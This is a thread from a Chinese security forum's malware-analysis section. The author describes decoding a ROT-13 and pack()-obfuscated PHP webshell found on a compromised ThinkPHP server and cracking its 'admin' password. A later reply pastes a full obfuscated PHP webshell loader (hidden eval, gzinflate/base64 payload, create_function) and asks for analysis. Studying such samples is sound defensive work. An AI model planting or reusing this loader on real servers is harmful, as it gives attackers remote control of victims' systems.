吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 11998|回复: 61
收起左侧

[PC样本分析] 分析一个常见的php大马并且解码过程

  [复制链接]
drawfans 发表于 2020-8-11 20:16
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 drawfans 于 2020-8-13 19:03 编辑

今天在逛群的时候,看到有人说服务器被中了马,截图看了一下,是一个php的大马。
看到用的是tp6框架,应该是被利用了远程执行的漏洞强行中了马。
微信截图_20200811193653.png
拿到了这个马我用编辑器打开了一下,果然是一句话,一个经过ROT-13编码的php大马。
微信截图_20200811193913.png
微信截图_20200811193941.png
看到了利用str_rot13对字符进行解码。那方法就来啦。
微信截图_20200811194011.png
简单对文件修改一下。
微信截图_20200811195840.png
这个马用到了pack(),意思就是函数把数据装入一个二进制字符串,
然后放入字符以字符的形式写出来。
流程应该没错。我就放到本地测试一下。
启动了php服务。
微信截图_20200811201009.png
成功。
微信截图_20200811200401.png
格式化一下
微信截图_20200811200516.png
完整的代码就来了。
微信截图_20200811200701.png
加上原来的文件头部分代码。
运行一下。
微信截图_20200811201213.png
检测了md5,这串md5不就是admin吗。。哈哈哈
微信截图_20200811201336.png
验证成功。进入了面板了。
微信截图_20200811201250.png
感觉传这些马的人都闲的没事情做。

就这么多了。

木马样本我就不上传了,避免不法人拿去使用。。
以上仅供经验分享,高手勿喷,嘴下留情。

2020年8月13号编辑
微信截图_20200813190207.png
应要求,留下样本。
php大马.zip (42.76 KB, 下载次数: 543)
木马样本文件,请勿上传到服务器上运行。测试请在本地测试。

免费评分

参与人数 11吾爱币 +17 热心值 +9 收起 理由
SR_Anto + 1 + 1 学习了
熊未泯 + 1 + 1 谢谢@Thanks!
dalong9704 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
repairman1970 + 1 我很赞同!
yaqud + 1 我很赞同!
dreamlivemeng + 1 + 1 谢谢@Thanks!
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
kk52140 + 2 + 1 我很赞同!
不懂就问小小白 + 1 谢谢@Thanks!
sxlcity + 1 + 1 学习了,谢谢分享!
Lucifer_BW + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| drawfans 发表于 2020-8-13 19:04
样本已经上传。详情请看帖子页尾。
83835332 发表于 2020-11-25 16:51
大佬分析下这个木马呗
[PHP] 纯文本查看 复制代码
<?php
$password='admin';//登录密码

$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZdb5tKEH2PlP+wQVEBiTq4jaPeWJGapoTmKsapDU6TNkJ4WQw1ZumyLq3T/Pc7i+0YAzdJ/WKxO3PmzJkP2N0hjFHmMpJSxqNkouhqd3cnI1kW0cTNuMe4Ik6iACl7UZYRruy7Q2M4vOhbX6U0TL00ku5UFd3v7iD47WN0gmS5u3qaZ4R5E5JwcdqjiyiOvYPDlo4UTGepx6NxTLqoN7ww0FFL76LrKPFpniHLRp3WG3WDw2JAGHsZOTp0fYKpT5TtJ+nGCYc90zLGb297ve+Gfjvy3/p6xxl9GYWjxYjfJNPDntE2HHgeT/+dS6paQrdIXgsgXS4+XI3NOPTagwvvi/W5b4Z5zzyfYnPSweZ57tkOw99v45s30/zGDjvedcpvF/FPYlp5/9pi/iycXeYnJ9Iq0jKckDKYJ5gLhcmvKOOZIgcZxVOakkTeaFlwi6NkCsxSj2XEBaKKYLtmXlj8mBP2G0wK068yqBrKd2WDkGZC/4wzTmOaE6asTMWFfLcFFqRg+UhGKXw19E7X0D50SkKX/wClobZe9hRZgfcW+QKRzkVwyTRsdHC/JPuAPtn21UG7pX9j3xKp2+DRApdPEPsY3RccHp60dKDNXp+KPjtGf99lT0Kf0SQhRa2O0VlMMyKsmzyCnEWcCA20wlutIkZJSDyfMFCjXb3DNOHAPhNKVYHzMIoJTF9AaFBIXNN43ShE1G5CoJ8KFof6P0dVFo+l2rA5QXoj4jax1rLBSAPew3MhXr1Cyoof5AfSoT9/UOlAqNmcVVU4/fnwlccAi6IVutVEF0OzTrB0uUJ42IzrHjR8SkFWrK23hSqyqo0xhks3SiIuP3FPfhFcHXMcAplHb6XMtTiFxUtT2L041NCZM7jsX9ku/C3pvMjavugZfceGue28yH5g2M7Asgen1vDcGGjIHjjGy2gNjcGpaVi2Vtr/W0sGr3MVSgjnGu6qaJsbKMbz5QDpXGh/RfZi2HNiW7pB007lZJaKUXsfwGTVFmoRASz4b2VpWW/NIoP30SyNxXtClrUVplrvoibOkk/ijxE7TfxzIFBp/aZIgqfIzF13a410vWebNNqDcQu8OCP/E7GIBo7ieyD28FIb8ATKEsDgUsRSvIYPAoCZLKIkiD1efVEDioApCip4vuCjgvz04kaLJc5/')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/
 楼主| drawfans 发表于 2020-8-15 11:51
liudazhi 发表于 2020-8-15 11:17
据我所知,应该是只有TP5.0.X-5.0.23    TP5.1.X-5.1.31   这个版本的TP5有远程代码执行。而TP6的话,就好 ...

确实是远程执行,应该第三方程序开发开发过程中权限控制不妥导致的,可能非TP6本身的问题。因为我没有看到他们的log日志,暂时无法知道究竟是从哪里写入的马
sky995 发表于 2020-8-12 00:06
优秀 主要是编码解码值得学习
AlexAux 发表于 2020-8-12 00:39
思路学到了
不懂就问小小白 发表于 2020-8-12 02:21
感谢楼主的分享!
孤狼微博 发表于 2020-8-12 02:26
昨天下午的马马上就解密了,你是大神
kk52140 发表于 2020-8-12 08:50
厉害厉害
涛之雨 发表于 2020-8-12 09:04
eval类型的加密,解密起来还是很容易的。。。
输出大法好
tangyi606 发表于 2020-8-12 09:17
感觉好好玩的样子!怎么就一串乱乱的东西编程了代码了
msslsk 发表于 2020-8-12 09:53
原来是长这样
头像被屏蔽
偶尔平凡 发表于 2020-8-12 09:58
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-28 23:52

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表